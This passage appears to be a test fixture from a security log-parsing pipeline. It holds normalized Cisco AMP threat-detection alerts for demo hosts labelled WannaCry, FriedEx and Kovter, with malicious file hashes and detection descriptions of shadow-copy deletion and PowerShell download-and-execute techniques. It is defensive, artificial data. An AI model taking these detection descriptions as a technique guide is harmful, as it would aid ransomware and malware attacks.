+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179209167470598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419179209167471000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.ED01EBFBC9-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419179209167470598",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T11:26:35.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854060930Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419179209167471000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419179209167470601",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "mssecsvc.exe",
+                "pid": 3020,
+                "hash": {
+                    "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26",
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "md5": "db349b97c37d22f5ea1d1841e3c89eb4"
+                }
+            },
+            "@timestamp": "2021-01-14T11:26:35.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\WINDOWS\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854062787Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":3020,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419179209167471000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.ED01EBFBC9-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419179204872503300",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "services.exe",
+                "pid": 480,
+                "hash": {
+                    "sha1": "ff658a36899e43fec3966d608b4aa4472de7a378",
+                    "sha256": "a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536",
+                    "md5": "71c85477df9347fe8e7bc55768473fca"
+                }
+            },
+            "@timestamp": "2021-01-14T10:59:33.000Z",
+            "file": {
+                "name": "mscorsvw.exe",
+                "path": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe",
+                "hash": {
+                    "sha1": "c78f4c22dd195a1791472a2c271a0c85b53900d9",
+                    "sha256": "90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0",
+                    "md5": "75a758a0c5cea48c9922d64a113d0f9d"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_MAP_FriedEx"
+                ],
+                "hash": [
+                    "90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0",
+                    "75a758a0c5cea48c9922d64a113d0f9d",
+                    "c78f4c22dd195a1791472a2c271a0c85b53900d9"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_MAP_FriedEx",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_AMP_MAP_FriedEx"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854064627Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583840597369422000,\"timestamp\":1610621973,\"timestamp_nanoseconds\":231000000,\"date\":\"2021-01-14T10:59:33+00:00\",\"event_type\":\"Malicious Activity Detection\",\"event_type_id\":1090519105,\"detection\":\"W32.MAP.Ransomware.rewrite\",\"detection_id\":\"6583840593074454529\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mscorsvw.exe\",\"file_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\mscorsvw.exe\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\",\"sha1\":\"c78f4c22dd195a1791472a2c271a0c85b53900d9\",\"md5\":\"75a758a0c5cea48c9922d64a113d0f9d\"},\"parent\":{\"process_id\":480,\"disposition\":\"Clean\",\"file_name\":\"services.exe\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\",\"sha1\":\"ff658a36899e43fec3966d608b4aa4472de7a378\",\"md5\":\"71c85477df9347fe8e7bc55768473fca\"}}}}}",
+                "kind": "alert",
+                "action": "Malicious Activity Detection",
+                "id": "6583840597369422000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.MAP.Ransomware.rewrite",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "04:e6:4d:d5:7a:b5",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "04:e6:4d:d5:7a:b5"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6583840593074454529",
+                    "event_type_id": 1090519105
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0"
+                }
+            },
+            "@timestamp": "2021-01-14T10:59:30.000Z",
+            "file": {
+                "name": "vssadmin.exe",
+                "path": "file:///C%3A/Windows/SysWOW64/vssadmin.exe",
+                "hash": {
+                    "sha256": "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_MAP_FriedEx"
+                ],
+                "hash": [
+                    "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_MAP_FriedEx",
+                "hostname": "Demo_AMP_MAP_FriedEx"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854066521Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6701398782847286000,\"timestamp\":1610621970,\"timestamp_nanoseconds\":182000000,\"date\":\"2021-01-14T10:59:30+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621970,\"start_date\":\"2021-01-14T10:59:30+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"file:///C%3A/Windows/SysWOW64/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\"}}}}}",
+                "kind": "alert",
+                "start": "2021-01-14T10:59:30.000Z",
+                "action": "Cloud IOC",
+                "id": "6701398782847286000",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "04:e6:4d:d5:7a:b5",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Clean",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "04:e6:4d:d5:7a:b5"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "cloud_ioc": {
+                        "short_description": "W32.PossibleRansomwareShadowCopyDeletion.ioc",
+                        "description": "Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity."
+                    },
+                    "event_type_id": 1107296274
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536"
+                }
+            },
+            "@timestamp": "2021-01-14T10:55:07.000Z",
+            "file": {
+                "name": "cmd.exe",
+                "path": "file:///C%3A/Windows/system32/cmd.exe",
+                "hash": {
+                    "sha256": "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_MAP_FriedEx"
+                ],
+                "hash": [
+                    "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_MAP_FriedEx",
+                "hostname": "Demo_AMP_MAP_FriedEx"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854068405Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136036637603000,\"timestamp\":1610621707,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-14T10:55:07+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621707,\"start_date\":\"2021-01-14T10:55:07+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"file:///C%3A/Windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\"}}}}}",
+                "kind": "alert",
+                "start": "2021-01-14T10:55:07.000Z",
+                "action": "Cloud IOC",
+                "id": "7007136036637603000",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "04:e6:4d:d5:7a:b5",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Clean",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "04:e6:4d:d5:7a:b5"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "cloud_ioc": {
+                        "short_description": "W32.PowershellEncodedBuffer.ioc",
+                        "description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools."
+                    },
+                    "event_type_id": 1107296274
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"
+                }
+            },
+            "@timestamp": "2021-01-14T10:47:17.000Z",
+            "file": {
+                "name": "powershell.exe",
+                "path": "/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe",
+                "hash": {
+                    "sha256": "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Command_Line_Arguments_Kovter"
+                ],
+                "hash": [
+                    "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Command_Line_Arguments_Kovter",
+                "hostname": "Demo_Command_Line_Arguments_Kovter"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:23.854070258Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066250000100,\"timestamp\":1610621237,\"timestamp_nanoseconds\":250000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}",
+                "kind": "alert",
+                "start": "2021-01-14T10:47:17.000Z",
+                "action": "Cloud IOC",
+                "id": "1476905066250000100",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "b6:9c:d0:89:b8:66",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Clean",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "b6:9c:d0:89:b8:66"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "cloud_ioc": {
+                        "short_description": "W32.PowershellDownloadedExecutable.ioc",
+                        "description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command."
+                    },
+                    "event_type_id": 1107296274
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"
+                }
+            },
+            "@timestamp": "2021-01-14T10:47:17.000Z",
+            "file": {
+                "name": "powershell.exe",
+                "path": "/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe",
+                "hash": {
+                    "sha256": "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Command_Line_Arguments_Kovter"
+                ],
+                "hash": [
+                    "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Command_Line_Arguments_Kovter",
+                "hostname": "Demo_Command_Line_Arguments_Kovter"
+            },
+            "event": {
+                "severity": 2,
